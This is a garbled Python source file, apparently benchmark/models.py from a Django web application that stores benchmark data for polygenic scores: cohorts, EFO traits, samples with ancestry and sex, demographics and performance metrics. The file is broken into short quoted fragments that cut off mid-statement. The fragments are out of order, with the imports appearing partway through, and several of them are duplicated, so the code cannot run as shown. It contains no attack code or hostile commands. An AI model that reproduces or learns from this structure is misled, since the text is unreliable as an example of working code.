[mean, median] unit = models.TextField(verbose_name='Unit', max_length=100, null=False,", "Controls', null=True) # Sample sex type information SAMPLE_SEX_CHOICES = [ ('Both', 'Both'), ('Male',", "> 1): return '<ul><li>'+'</li><li>'.join(l)+'</li></ul>' else: return '' def display_values_dict(self): l = {} #", "Name', max_length=1000) def __str__(self): return self.name_short class BM_EFOTrait(models.Model): \"\"\"Abstract class to hold information", "= models.TextField(verbose_name='Units of the effect size', max_length=100, blank = False) ci = DecimalRangeField(verbose_name='95%", "Confidence Interval', null=True) se = models.FloatField(verbose_name='Standard error of the effect', null=True) def __str__(self):", "to controlled trait vocabulary (mainly to link multiple EFO to a single score)\"\"\"", "for othermetrics in othermetrics_list: othermetrics_data.append({'labels': othermetrics[0], 'value': othermetrics[1]}) perf_metrics['othermetrics'] = othermetrics_data return perf_metrics", "if self.sample_cases != None: percent = (self.sample_cases / self.sample_number) * 100 return round(percent,2)", "self.unit return l def range_type_desc(self): desc_list = { 'ci': 'Confidence interval', 'iqr': 'Interquartile", "'cohorts', 'samples', 'ancestries'] data = {} for type in data_types: data[type] = set()", "othermetrics_data = [] if othermetrics_list: for othermetrics in othermetrics_list: othermetrics_data.append({'labels': othermetrics[0], 'value': othermetrics[1]})", "'ci': e += ' {}'.format(str(self.range)) e += ' {}'.format(self.unit) if len(e) > 0:", "in self.effect_sizes_list: effect_sizes_data.append({'labels': effect_size[0], 'value': effect_size[1]}) perf_metrics['effect_sizes'] = effect_sizes_data class_acc_list = self.class_acc_list class_acc_data", "!= None: l.append(v) # Range r = None if '[' not in e:", "# for category in categories: # v_spacing = ' class=\"mt-1\"' if len(category_labels) >", "== None and self.range != None: return 
'{}:{}'.format(self.range_type, str(self.range)) return None def format_variability(self):", "= DecimalRangeField(verbose_name='95% Confidence Interval', null=True) se = models.FloatField(verbose_name='Standard error of the effect', null=True)", "self.get_metric_data('Effect Size') @property def class_acc_list(self): return self.get_metric_data('Classification Metric') @property def othermetrics_list(self): return self.get_metric_data('Other", "sample_age = models.OneToOneField(BM_Demographic, on_delete=models.CASCADE,related_name='ages_of', null=True) ## Description phenotyping_free = models.TextField('Detailed Phenotype Description', null=True)", "self.variability_type.title(), self.variability, self.unit) else: v = no_helptip.format(self.variability_type.title(), self.variability, self.unit) if v != None:", "performance metric\"\"\" performance = models.ForeignKey(BM_Performance, on_delete=models.CASCADE, verbose_name='PGS Performance Metric (PPM)', related_name=\"performance_metric\") TYPE_CHOICES =", "evaluation efotrait = models.ForeignKey(BM_EFOTrait, on_delete=models.PROTECT, verbose_name='EFO Trait', related_name=\"efotrait_performance\") cohort = models.ForeignKey(BM_Cohort, verbose_name='Cohort', on_delete=models.PROTECT,", "categories] # else: # return [] #@property #def category_labels(self): # category_labels = self.category_labels_list", "def display_value(self): l = [] helptip = '<span title=\"{}\" class=\"pgs_helptip\">{}</span> : {} {}'", "str(self.estimate) if self.range != None and self.range_type.lower() == 'ci': estimate += str(self.range) if", "= models.TextField('Detailed Phenotype Description', null=True) phenotype_structured = models.ManyToManyField(BM_Coding, verbose_name='Codings', related_name='coding_sample') followup_time = models.OneToOneField(BM_Demographic,", "null=True) def __str__(self): return 'Sample: {}'.format(str(self.pk)) @property def sample_cases_percent(self): if self.sample_cases != None:", "Confidence interval (ci), 
range, interquartile range (iqr), open range variability = models.FloatField(verbose_name='Variability (value)',", "return 'Sample: {}'.format(str(self.pk)) @property def sample_cases_percent(self): if self.sample_cases != None: percent = (self.sample_cases", "'Sample: {}'.format(str(self.pk)) @property def sample_cases_percent(self): if self.sample_cases != None: percent = (self.sample_cases /", "self.synonyms.split(' | ') # else: # return [] #@property #def mapped_terms_list(self): # if", "if effect_sizes_list: for effect_size in self.effect_sizes_list: effect_sizes_data.append({'labels': effect_size[0], 'value': effect_size[1]}) perf_metrics['effect_sizes'] = effect_sizes_data", "in data_types: #print(type+\": \"+str(list(data_count[type]))) self.bm_data[type] = list(data[type]) @property def count_scores(self): if not hasattr(self,", "# Range if self.range != None and '[' not in estimate: l[self.range_type] =", "= '' # if len(categories) > 0: # category_labels = [] # for", "Sample fields (sample_age, followup_time) that can be point estimates or distributions\"\"\" estimate =", "name_full = models.CharField('Cohort Full Name', max_length=1000) def __str__(self): return self.name_short class BM_EFOTrait(models.Model): \"\"\"Abstract", "@property def sample_cases_percent(self): if self.sample_cases != None: percent = (self.sample_cases / self.sample_number) *", "if self.estimate != None: estimate = str(self.estimate) if self.range != None and self.range_type.lower()", "max_length=100, db_index=True) name_full = models.CharField('Cohort Full Name', max_length=1000) def __str__(self): return self.name_short class", "if self.variability != None: l[self.variability_type] = self.variability # Unit if self.unit != None:", "def format_estimate(self): if self.estimate != None: return '{}:{}'.format(self.estimate_type, self.estimate) return None def format_range(self):", "['NR', '', None]: return self.ancestry_broad else: return '{} ({})'.format(self.ancestry_broad, 
self.ancestry_free) class BM_Performance(models.Model): \"\"\"Class", "Meta: get_latest_by = 'num' @property def effect_sizes_list(self): return self.get_metric_data('Effect Size') @property def class_acc_list(self):", "category_labels(self): # category_labels = self.category_labels_list # categories_data = '' # if len(category_labels) >", "self.sample_controls != None: sstring += '<li><span class=\"only_export\">, </span>' sstring += '{:,} controls</li>'.format(self.sample_controls) sstring", "perf_metrics def get_metric_data(self, metric_type): \"\"\" Generic method to extract and format the diverse", "from django.conf import settings from django.core.validators import MaxValueValidator, MinValueValidator from django.contrib.postgres.fields import DecimalRangeField", "#for bm_performance in BM_Performance.objects.using(\"benchmark\").filter(efotrait=self).order_by('id'): # cohorts.add(bm_performance.cohort.id) #return len(list(cohorts)) @property def count_samples(self): if not", "of Controls', null=True) # Sample sex type information SAMPLE_SEX_CHOICES = [ ('Both', 'Both'),", "default='range') # e.g. 
Confidence interval (ci), range, interquartile range (iqr), open range variability", "category in categories: # v_spacing = ' class=\"mt-1\"' if len(category_labels) > 0 else", "format_unit(self): if self.unit != None: return '{}:{}'.format('unit', self.unit) return None def display_value(self): l", "# ex: \"Odds Ratio\" name_short = models.CharField(verbose_name='Performance Metric Name (Short)', max_length=25, null=True) #", "\"\"\"Class to hold metric type, name, value and confidence intervals of a performance", "db_index=True) name_full = models.CharField('Cohort Full Name', max_length=1000) def __str__(self): return self.name_short class BM_EFOTrait(models.Model):", "<filename>benchmark/models.py from django.db import models from django.conf import settings from django.core.validators import MaxValueValidator,", "sample_cases_percent(self): if self.sample_cases != None: percent = (self.sample_cases / self.sample_number) * 100 return", "if len(categories) > 0: # return [x.label for x in categories] # else:", "[] if othermetrics_list: for othermetrics in othermetrics_list: othermetrics_data.append({'labels': othermetrics[0], 'value': othermetrics[1]}) perf_metrics['othermetrics'] =", "'Classification Metric'), ('OM', 'Other Metric') ] type = models.CharField(max_length=40, choices=TYPE_CHOICES, default='Other Metric', db_index=True", "on_delete=models.PROTECT, related_name='cohort_performance') def __str__(self): return '%s | %s | %s'%(self.efotrait.id, self.score_id, self.cohort.name_short) class", "display_value(self): l = [] helptip = '<span title=\"{}\" class=\"pgs_helptip\">{}</span> : {} {}' no_helptip", "default='se') # e.g. 
standard deviation (sd), standard error (se) def format_estimate(self): if self.estimate", "self.range_type.lower() in desc_list: return desc_list[self.range_type.lower()] def variability_type_desc(self): desc_list = { 'sd': 'Standard Deviation',", "Unit if self.unit != None: l['unit'] = self.unit return l def range_type_desc(self): desc_list", "Information', null=True) def __str__(self): return 'Sample: {}'.format(str(self.pk)) @property def sample_cases_percent(self): if self.sample_cases !=", "# Using all and filter afterward uses less SQL queries than filtering directly", "import MaxValueValidator, MinValueValidator from django.contrib.postgres.fields import DecimalRangeField class BM_Coding(models.Model): \"\"\"Class to describe the", "of the effect size', max_length=100, blank = False) ci = DecimalRangeField(verbose_name='95% Confidence Interval',", "def display_values_dict(self): l = {} # Estimate estimate = '' if self.estimate !=", "null=True) ## Cohorts/Sources #source_GWAS_catalog = models.CharField('GWAS Catalog Study ID (GCST...)', max_length=20, null=True) #source_PMID", "for type in data_types: data[type] = set() #for bm_performance in BM_Performance.objects.using(\"benchmark\").filter(efotrait=self).order_by('id'): for bm_performance", "(type_desc): r = helptip.format(type_desc, self.range_type.title(), str(self.range), self.unit) else: r = no_helptip.format(self.range_type.title(), str(self.range), self.unit)", "Interval', null=True) se = models.FloatField(verbose_name='Standard error of the effect', null=True) def __str__(self): if", "# if self.synonyms: # return self.synonyms.split(' | ') # else: # return []", "no_helptip = '{} : {} {}' # Estimate e = '' if self.estimate", "%s'%(self.efotrait.id, self.score_id, self.cohort.name_short) class Meta: get_latest_by = 'num' @property def effect_sizes_list(self): return self.get_metric_data('Effect", "(len(l) > 1): return '<ul><li>'+'</li><li>'.join(l)+'</li></ul>' else: return '' def 
display_values_dict(self): l = {}", "Performance Metric (PPM)', related_name=\"performance_metric\") TYPE_CHOICES = [ ('ES', 'Effect Size'), ('CM', 'Classification Metric'),", "models.TextField('Country of Recruitment', null=True) ancestry_additional = models.TextField('Additional Ancestry Description', null=True) ## Cohorts/Sources #source_GWAS_catalog", "estimate = models.FloatField(verbose_name='Estimate', null=False) unit = models.TextField(verbose_name='Units of the effect size', max_length=100, blank", "['NR', '', None]: return self.ancestry_broad else: return '{}<br/>({})'.format(self.ancestry_broad, self.ancestry_free) @property def display_ancestry_inline(self): if", "'<span title=\"{}\" class=\"pgs_helptip\">{}</span> : {} {}' no_helptip = '{} : {} {}' #", "#def category_list(self): # return sorted(self.traitcategory.all(), key=lambda y: y.label) #@property #def category_labels_list(self): # categories", "None: l.append(r) if (len(l) == 1): return l[0] elif (len(l) > 1): return", "max_length=100, null=True) cohort = models.ForeignKey(BM_Cohort, verbose_name='Cohort', on_delete=models.PROTECT, related_name='cohort_sample') #cohorts_additional = models.TextField('Additional Sample/Cohort Information',", "self.estimate) return None def format_range(self): if self.estimate == None and self.range != None:", "for class_acc in self.class_acc_list: class_acc_data.append({'labels': class_acc[0], 'value': class_acc[1]}) perf_metrics['class_acc'] = class_acc_data othermetrics_list =", "= ', '.join(category_labels) # return categories_data #@property #def display_category_labels(self): # categories = self.category_list", "= self.range_type_desc() if (type_desc): r = helptip.format(type_desc, self.range_type.title(), str(self.range), self.unit) else: r =", "self.ci) else: s = '{}'.format(self.estimate) if (self.name_short): return '%s (%s): %s'%(self.name, self.name_short, s)", "verbose_name='PGS Performance Metric (PPM)', related_name=\"performance_metric\") 
TYPE_CHOICES = [ ('ES', 'Effect Size'), ('CM', 'Classification", "controls</li>'.format(self.sample_controls) sstring += '</ul>' sstring += '<span class=\"only_export\">]</span>' sstring += '</div>' else: sstring", "error (se) def format_estimate(self): if self.estimate != None: return '{}:{}'.format(self.estimate_type, self.estimate) return None", "Individuals', validators=[MinValueValidator(1)]) sample_cases = models.IntegerField('Number of Cases', null=True) sample_controls = models.IntegerField('Number of Controls',", "title=\"{}\" class=\"pgs_helptip\">{}</span> : {} {}' no_helptip = '{} : {} {}' # Estimate", "if self.estimate != None: e += '{} : {}'.format(self.estimate_type.title(), self.estimate) if self.range !=", "'{}'.format(self.estimate) return s def name_tuple(self): if self.name_short is None: return (self.name, self.name) else:", "= models.IntegerField('Number of Individuals', validators=[MinValueValidator(1)]) sample_cases = models.IntegerField('Number of Cases', null=True) sample_controls =", "def format_variability(self): if self.variability != None: return '{}:{}'.format(self.variability_type, self.variability) return None def format_unit(self):", "categories_data class BM_Demographic(models.Model): \"\"\"Class to describe Sample fields (sample_age, followup_time) that can be", "'<a href=\"%s\">%s</a><span class=\"only_export\">: %s</span>'%(self.url, self.id, self.url) @property def display_phenotype_structured(self): data = [] phenotype_structured", "id = models.CharField('Code ID', max_length=30, primary_key=True) label = models.CharField('Code Label', max_length=500, db_index=True) type", "def display_label(self): return '<a href=\"../../benchmark/%s\">%s</a>'%(self.id, self.label) #@property #def display_id_url(self): # return '<a href=\"%s\">%s</a><span", "# Range r = None if '[' not in e: if self.range !=", "if self.ci != None: s = '{} {}'.format(self.estimate, self.ci) else: s = '{}'.format(self.estimate)", "Using all and filter 
afterward uses less SQL queries than filtering directly on", "self.get_metric_data('Classification Metric') @property def othermetrics_list(self): return self.get_metric_data('Other Metric') @property def performance_metrics(self): perf_metrics =", "description = models.TextField('Ontology Trait Description', null=True) #url = models.CharField('Ontology URL', max_length=500) #synonyms =", "sstring += '{:,} individuals'.format(self.sample_number) return sstring @property def display_ancestry(self): if self.ancestry_free in ['NR',", "+= '<div><a class=\"toggle_table_btn pgs_helptip\" id=\"'+div_id+'\" title=\"Click to show/hide the details\">{:,} individuals <i class=\"fa", "= models.ForeignKey(BM_Performance, on_delete=models.CASCADE, verbose_name='PGS Performance Metric (PPM)', related_name=\"performance_metric\") TYPE_CHOICES = [ ('ES', 'Effect", "@property def effect_sizes_list(self): return self.get_metric_data('Effect Size') @property def class_acc_list(self): return self.get_metric_data('Classification Metric') @property", "# return categories_data #@property #def display_category_labels(self): # categories = self.category_list # categories_data =", "models.IntegerField('Number of Controls', null=True) # Sample sex type information SAMPLE_SEX_CHOICES = [ ('Both',", "for bm_performance in self.efotrait_performance.all(): #print(str(bm_performance)) data['scores'].add(bm_performance.score_id) data['cohorts'].add(bm_performance.cohort) data['samples'].add(bm_performance.sample.id) data['ancestries'].add(bm_performance.sample.ancestry_broad) for type in data_types:", "') # else: # return [] #@property #def category_list(self): # return sorted(self.traitcategory.all(), key=lambda", "and filter afterward uses less SQL queries than filtering directly on the queryset", "models.TextField('Additional Ancestry Description', null=True) ## Cohorts/Sources #source_GWAS_catalog = models.CharField('GWAS Catalog Study ID (GCST...)',", "null=True) # Sample sex type information 
SAMPLE_SEX_CHOICES = [ ('Both', 'Both'), ('Male', 'Male'),", "metric\"\"\" performance = models.ForeignKey(BM_Performance, on_delete=models.CASCADE, verbose_name='PGS Performance Metric (PPM)', related_name=\"performance_metric\") TYPE_CHOICES = [", "= self.phenotype_structured.all() for phenotype in self.phenotype_structured.all(): data.append('<b>'+phenotype.id+'</b>: '+phenotype.label) return data def get_bm_data(self): self.bm_data", "Sample', related_name='sample_performance') # Samples used for evaluation efotrait = models.ForeignKey(BM_EFOTrait, on_delete=models.PROTECT, verbose_name='EFO Trait',", ": {} {}' # Estimate e = '' if self.estimate != None: e", "null=True) ## Description phenotyping_free = models.TextField('Detailed Phenotype Description', null=True) phenotype_structured = models.ManyToManyField(BM_Coding, verbose_name='Codings',", "Deviation', 'sd (cases)': 'Standard Deviation', 'se': 'Standard Error', } if self.variability_type.lower() in desc_list:", "0: l.append(e) # Variability v = None if self.variability != None: type_desc =", "Cases', null=True) sample_controls = models.IntegerField('Number of Controls', null=True) # Sample sex type information", "set of samples\"\"\" # Links to related objects score_id = models.CharField('Polygenic Score (PGS)", "ancestry_additional = models.TextField('Additional Ancestry Description', null=True) ## Cohorts/Sources #source_GWAS_catalog = models.CharField('GWAS Catalog Study", "= f' ({self.sample_cases_percent}%)' sstring += '<div><a class=\"toggle_table_btn pgs_helptip\" id=\"'+div_id+'\" title=\"Click to show/hide the", "self.variability_type.lower() in desc_list: return desc_list[self.variability_type.lower()] class BM_Sample(models.Model): \"\"\"Class to describe samples used in", "## Description phenotyping_free = models.TextField('Detailed Phenotype Description', null=True) phenotype_structured = models.ManyToManyField(BM_Coding, verbose_name='Codings', related_name='coding_sample')", "null=True) 
#source_PMID = models.CharField('Source PubMed ID (PMID) or doi', max_length=100, null=True) cohort =", "return desc_list[self.variability_type.lower()] class BM_Sample(models.Model): \"\"\"Class to describe samples used in variant associations and", "a PGS and a set of samples\"\"\" # Links to related objects score_id", "len(self.bm_data['scores']) @property def count_cohorts(self): if not hasattr(self, 'bm_data'): self.get_bm_data() return len(self.bm_data['cohorts']) #cohorts =", "the diverse metric data\"\"\" # Using all and filter afterward uses less SQL", "= self.variability_type_desc() if (type_desc): v = helptip.format(type_desc, self.variability_type.title(), self.variability, self.unit) else: v =", "%s'%(self.name, self.name_short, s) else: return '%s: %s'%(self.name, s) def display_value(self): if self.ci !=", "Sample Information ## Numbers sample_number = models.IntegerField('Number of Individuals', validators=[MinValueValidator(1)]) sample_cases = models.IntegerField('Number", "null=True) sample_controls = models.IntegerField('Number of Controls', null=True) # Sample sex type information SAMPLE_SEX_CHOICES", "def sample_cases_percent(self): if self.sample_cases != None: percent = (self.sample_cases / self.sample_number) * 100", "'.join(category_labels) # return categories_data #@property #def display_category_labels(self): # categories = self.category_list # categories_data", "{}'.format(self.estimate, self.ci) else: s = '{}'.format(self.estimate) return s def name_tuple(self): if self.name_short is", "def count_scores(self): if not hasattr(self, 'bm_data'): self.get_bm_data() #scores = set() #for bm_performance in", "e: if self.range != None: type_desc = self.range_type_desc() if (type_desc): r = helptip.format(type_desc,", "('Female', 'Female') ] sample_sex = models.CharField(max_length=6, choices=SAMPLE_SEX_CHOICES, default='Both', verbose_name='Sample Sex' ) sample_age =", "len(category_labels) > 0 else '' # category_labels.append('<div{}><span 
class=\"trait_colour\" style=\"background-color:{}\"></span>{}</div>'.format(v_spacing,category.colour,category.label)) # categories_data = ''.join(category_labels)", "'{}:{}'.format(self.variability_type, self.variability) return None def format_unit(self): if self.unit != None: return '{}:{}'.format('unit', self.unit)", "# return categories_data class BM_Demographic(models.Model): \"\"\"Class to describe Sample fields (sample_age, followup_time) that", "related_name='coding_sample') followup_time = models.OneToOneField(BM_Demographic, on_delete=models.CASCADE,related_name='followuptime_of', null=True) ## Ancestry ancestry_broad = models.CharField('Broad Ancestry Category',", "self.ancestry_broad else: return '{}<br/>({})'.format(self.ancestry_broad, self.ancestry_free) @property def display_ancestry_inline(self): if self.ancestry_free in ['NR', '',", "return '{}:{}'.format(self.estimate_type, self.estimate) return None def format_range(self): if self.estimate == None and self.range", "'<a href=\"../../benchmark/%s\">%s</a>'%(self.id, self.label) #@property #def display_id_url(self): # return '<a href=\"%s\">%s</a><span class=\"only_export\">: %s</span>'%(self.url, self.id,", "= models.FloatField(verbose_name='Estimate', null=False) unit = models.TextField(verbose_name='Units of the effect size', max_length=100, blank =", "self.variability # Unit if self.unit != None: l['unit'] = self.unit return l def", "[] if effect_sizes_list: for effect_size in self.effect_sizes_list: effect_sizes_data.append({'labels': effect_size[0], 'value': effect_size[1]}) perf_metrics['effect_sizes'] =", "in PGS \"\"\" id = models.CharField('Code ID', max_length=30, primary_key=True) label = models.CharField('Code Label',", "scores.add(bm_performance.score_id) return len(self.bm_data['scores']) @property def count_cohorts(self): if not hasattr(self, 'bm_data'): self.get_bm_data() return len(self.bm_data['cohorts'])", "name_short = models.CharField(verbose_name='Performance Metric Name 
(Short)', max_length=25, null=True) # ex: \"OR\" estimate =", "def name_tuple(self): if self.name_short is None: return (self.name, self.name) else: return (self.name, self.name_short)", "null=True) estimate_type = models.CharField(verbose_name='Estimate (type)', max_length=100, null=True, default='mean') #e.g. [mean, median] unit =", "data.append('<b>'+phenotype.id+'</b>: '+phenotype.label) return data def get_bm_data(self): self.bm_data = {} data_types = ['scores', 'cohorts',", "%s</span>'%(self.url, self.id, self.url) @property def display_phenotype_structured(self): data = [] phenotype_structured = self.phenotype_structured.all() for", "self.efotrait_performance.all(): #print(str(bm_performance)) data['scores'].add(bm_performance.score_id) data['cohorts'].add(bm_performance.cohort) data['samples'].add(bm_performance.sample.id) data['ancestries'].add(bm_performance.sample.ancestry_broad) for type in data_types: #print(type+\": \"+str(list(data_count[type]))) self.bm_data[type]", "] sample_sex = models.CharField(max_length=6, choices=SAMPLE_SEX_CHOICES, default='Both', verbose_name='Sample Sex' ) sample_age = models.OneToOneField(BM_Demographic, on_delete=models.CASCADE,related_name='ages_of',", "@property def othermetrics_list(self): return self.get_metric_data('Other Metric') @property def performance_metrics(self): perf_metrics = {} effect_sizes_list", "{ 'ci': 'Confidence interval', 'iqr': 'Interquartile range' } if self.range_type.lower() in desc_list: return", "len(e) > 0: l.append(e) # Variability v = None if self.variability != None:", "@property def display_ancestry(self): if self.ancestry_free in ['NR', '', None]: return self.ancestry_broad else: return", "# Samples used for evaluation efotrait = models.ForeignKey(BM_EFOTrait, on_delete=models.PROTECT, verbose_name='EFO Trait', related_name=\"efotrait_performance\") cohort", "!= None: e += '{} : {}'.format(self.estimate_type.title(), self.estimate) if self.range != None and", "null=True) 
ancestry_additional = models.TextField('Additional Ancestry Description', null=True) ## Cohorts/Sources #source_GWAS_catalog = models.CharField('GWAS Catalog", "= '{} {}'.format(self.estimate, self.ci) else: s = '{}'.format(self.estimate) return s def name_tuple(self): if", "verbose_name='PGS Sample', related_name='sample_performance') # Samples used for evaluation efotrait = models.ForeignKey(BM_EFOTrait, on_delete=models.PROTECT, verbose_name='EFO", "= '{} {}'.format(self.estimate, self.ci) else: s = '{}'.format(self.estimate) if (self.name_short): return '%s (%s):", "[] #@property #def category_labels(self): # category_labels = self.category_labels_list # categories_data = '' #", "None: return '{}:{}'.format(self.estimate_type, self.estimate) return None def format_range(self): if self.estimate == None and", "l.append(e) # Variability v = None if self.variability != None: type_desc = self.variability_type_desc()", "{} {}' no_helptip = '{} : {} {}' # Estimate e = ''", "= '' if self.estimate != None: estimate = str(self.estimate) if self.range != None", "type = models.CharField(max_length=40, choices=TYPE_CHOICES, default='Other Metric', db_index=True ) name = models.CharField(verbose_name='Performance Metric Name',", "= ['scores', 'cohorts', 'samples', 'ancestries'] data = {} for type in data_types: data[type]", "return self.bm_data['ancestries'] #@property #def synonyms_list(self): # if self.synonyms: # return self.synonyms.split(' | ')", "if v != None: l.append(v) # Range r = None if '[' not", "= [] if class_acc_list: for class_acc in self.class_acc_list: class_acc_data.append({'labels': class_acc[0], 'value': class_acc[1]}) perf_metrics['class_acc']", "= ' class=\"mt-1\"' if len(category_labels) > 0 else '' # category_labels.append('<div{}><span class=\"trait_colour\" style=\"background-color:{}\"></span>{}</div>'.format(v_spacing,category.colour,category.label))", "} if self.range_type.lower() in desc_list: return desc_list[self.range_type.lower()] def 
variability_type_desc(self): desc_list = { 'sd':", "if self.range != None and self.range_type.lower() == 'ci': e += ' {}'.format(str(self.range)) e", "in estimate: l[self.range_type] = str(self.range) # Variability if self.variability != None: l[self.variability_type] =", "queryset metrics = self.performance_metric.all() if metrics: l = [] for m in metrics:", "> 0: # category_labels = [] # for category in categories: # v_spacing", "Generic method to extract and format the diverse metric data\"\"\" # Using all", "effect_sizes_list = self.effect_sizes_list effect_sizes_data = [] if effect_sizes_list: for effect_size in self.effect_sizes_list: effect_sizes_data.append({'labels':", "Range if self.range != None and '[' not in estimate: l[self.range_type] = str(self.range)", "Classification of Diseases used in PGS \"\"\" id = models.CharField('Code ID', max_length=30, primary_key=True)", "# ex: \"OR\" estimate = models.FloatField(verbose_name='Estimate', null=False) unit = models.TextField(verbose_name='Units of the effect", "return len(self.bm_data['cohorts']) #cohorts = set() #for bm_performance in BM_Performance.objects.using(\"benchmark\").filter(efotrait=self).order_by('id'): # cohorts.add(bm_performance.cohort.id) #return len(list(cohorts))", "data = [] phenotype_structured = self.phenotype_structured.all() for phenotype in self.phenotype_structured.all(): data.append('<b>'+phenotype.id+'</b>: '+phenotype.label) return", "class=\"only_export\">, </span>' sstring += '{:,} controls</li>'.format(self.sample_controls) sstring += '</ul>' sstring += '<span class=\"only_export\">]</span>'", "in samples\"\"\" name_short = models.CharField('Cohort Short Name', max_length=100, db_index=True) name_full = models.CharField('Cohort Full", "class BM_Performance(models.Model): \"\"\"Class to hold performance/accuracy metrics for a PGS and a set", "(value)', null=True) variability_type = models.CharField(verbose_name='Range (type)', max_length=100, default='se') # e.g. 
standard deviation (sd),", "def display_ancestry_inline(self): if self.ancestry_free in ['NR', '', None]: return self.ancestry_broad else: return '{}", "e += ' {}'.format(self.unit) if len(e) > 0: l.append(e) # Variability v =", "Ancestry ancestry_broad = models.CharField('Broad Ancestry Category', max_length=100) ancestry_free = models.TextField('Ancestry (e.g. French, Chinese)',", "Full Name', max_length=1000) def __str__(self): return self.name_short class BM_EFOTrait(models.Model): \"\"\"Abstract class to hold", "of Individuals', validators=[MinValueValidator(1)]) sample_cases = models.IntegerField('Number of Cases', null=True) sample_controls = models.IntegerField('Number of", "self.range != None and '[' not in estimate: l[self.range_type] = str(self.range) # Variability", "BM_Metric(models.Model): \"\"\"Class to hold metric type, name, value and confidence intervals of a", "# if len(category_labels) > 0: # categories_data = ', '.join(category_labels) # return categories_data", "'{}:{}'.format(self.estimate_type, self.estimate) return None def format_range(self): if self.estimate == None and self.range !=", "get_bm_data(self): self.bm_data = {} data_types = ['scores', 'cohorts', 'samples', 'ancestries'] data = {}", "= effect_sizes_data class_acc_list = self.class_acc_list class_acc_data = [] if class_acc_list: for class_acc in", "helptip = '<span title=\"{}\" class=\"pgs_helptip\">{}</span> : {} {}' no_helptip = '{} : {}", "None: e += '{} : {}'.format(self.estimate_type.title(), self.estimate) if self.range != None and self.range_type.lower()", "> 0 else '' # category_labels.append('<div{}><span class=\"trait_colour\" style=\"background-color:{}\"></span>{}</div>'.format(v_spacing,category.colour,category.label)) # categories_data = ''.join(category_labels) #", "max_length=100, null=False, default='years') # e.g. 
[years, months, days] range = DecimalRangeField(verbose_name='Range (values)', null=True)", "categories_data = ''.join(category_labels) # return categories_data class BM_Demographic(models.Model): \"\"\"Class to describe Sample fields", "x in categories] # else: # return [] #@property #def category_labels(self): # category_labels", "mapped_terms_list(self): # if self.mapped_terms: # return self.mapped_terms.split(' | ') # else: # return", "+= '<li><span class=\"only_export\">, </span>' sstring += '{:,} controls</li>'.format(self.sample_controls) sstring += '</ul>' sstring +=", "'<ul>\\n<li>{:,} cases{}</li>\\n'.format(self.sample_cases, percent_cases) if self.sample_controls != None: sstring += '<li><span class=\"only_export\">, </span>' sstring", "('OM', 'Other Metric') ] type = models.CharField(max_length=40, choices=TYPE_CHOICES, default='Other Metric', db_index=True ) name", "self.phenotype_structured.all() for phenotype in self.phenotype_structured.all(): data.append('<b>'+phenotype.id+'</b>: '+phenotype.label) return data def get_bm_data(self): self.bm_data =", "categories = self.category_list # if len(categories) > 0: # return [x.label for x", "TYPE_CHOICES = [ ('ES', 'Effect Size'), ('CM', 'Classification Metric'), ('OM', 'Other Metric') ]", "Description', null=True) ## Cohorts/Sources #source_GWAS_catalog = models.CharField('GWAS Catalog Study ID (GCST...)', max_length=20, null=True)", "categories] # else: # return [] #@property #def category_list(self): # return sorted(self.traitcategory.all(), key=lambda", "afterward uses less SQL queries than filtering directly on the queryset metrics =", "None: return '{}:{}'.format('unit', self.unit) return None def display_value(self): l = [] helptip =", "@property def cohorts_list(self): if not hasattr(self, 'bm_data'): self.get_bm_data() return self.bm_data['cohorts'] @property def ancestries_list(self):", "models.CharField('Source PubMed ID (PMID) or doi', max_length=100, null=True) cohort = 
models.ForeignKey(BM_Cohort, verbose_name='Cohort', on_delete=models.PROTECT,", "class=\"only_export\">]</span>' sstring += '</div>' else: sstring += '{:,} individuals'.format(self.sample_number) return sstring @property def", "None def format_variability(self): if self.variability != None: return '{}:{}'.format(self.variability_type, self.variability) return None def", "db_index=True) description = models.TextField('Ontology Trait Description', null=True) #url = models.CharField('Ontology URL', max_length=500) #synonyms", "if self.sample_controls != None: sstring += '<li><span class=\"only_export\">, </span>' sstring += '{:,} controls</li>'.format(self.sample_controls)", "can be point estimates or distributions\"\"\" estimate = models.FloatField(verbose_name='Estimate (value)', null=True) estimate_type =", "id=\"list_'+div_id+'\">' sstring += '<span class=\"only_export\">[</span>' sstring += '<ul>\\n<li>{:,} cases{}</li>\\n'.format(self.sample_cases, percent_cases) if self.sample_controls !=", "'{}<br/>({})'.format(self.ancestry_broad, self.ancestry_free) @property def display_ancestry_inline(self): if self.ancestry_free in ['NR', '', None]: return self.ancestry_broad", "not hasattr(self, 'bm_data'): self.get_bm_data() return self.bm_data['cohorts'] @property def ancestries_list(self): if not hasattr(self, 'bm_data'):", "hold metric type, name, value and confidence intervals of a performance metric\"\"\" performance", "l.append(v) # Range r = None if '[' not in e: if self.range", "diverse metric data\"\"\" # Using all and filter afterward uses less SQL queries", "if class_acc_list: for class_acc in self.class_acc_list: class_acc_data.append({'labels': class_acc[0], 'value': class_acc[1]}) perf_metrics['class_acc'] = class_acc_data", "= estimate # Range if self.range != None and '[' not in estimate:", "Description', null=True) phenotype_structured = models.ManyToManyField(BM_Coding, verbose_name='Codings', related_name='coding_sample') followup_time = 
models.OneToOneField(BM_Demographic, on_delete=models.CASCADE,related_name='followuptime_of', null=True) ##", "category_labels.append('<div{}><span class=\"trait_colour\" style=\"background-color:{}\"></span>{}</div>'.format(v_spacing,category.colour,category.label)) # categories_data = ''.join(category_labels) # return categories_data class BM_Demographic(models.Model): \"\"\"Class", "controlled trait vocabulary (mainly to link multiple EFO to a single score)\"\"\" id", "estimate: l[self.estimate_type] = estimate # Range if self.range != None and '[' not", "Variability if self.variability != None: l[self.variability_type] = self.variability # Unit if self.unit !=", "django.conf import settings from django.core.validators import MaxValueValidator, MinValueValidator from django.contrib.postgres.fields import DecimalRangeField class", "effect_sizes_data = [] if effect_sizes_list: for effect_size in self.effect_sizes_list: effect_sizes_data.append({'labels': effect_size[0], 'value': effect_size[1]})", "\"\"\"Class to hold performance/accuracy metrics for a PGS and a set of samples\"\"\"", "effect_sizes_list: for effect_size in self.effect_sizes_list: effect_sizes_data.append({'labels': effect_size[0], 'value': effect_size[1]}) perf_metrics['effect_sizes'] = effect_sizes_data class_acc_list", "othermetrics_data return perf_metrics def get_metric_data(self, metric_type): \"\"\" Generic method to extract and format", "sstring += '{:,} controls</li>'.format(self.sample_controls) sstring += '</ul>' sstring += '<span class=\"only_export\">]</span>' sstring +=", "Label', max_length=500, db_index=True) description = models.TextField('Ontology Trait Description', null=True) #url = models.CharField('Ontology URL',", "!= None: percent = (self.sample_cases / self.sample_number) * 100 return round(percent,2) else: return", "= models.TextField('Mapped terms', null=True) phenotype_structured = models.ManyToManyField(BM_Coding, verbose_name='Codings', 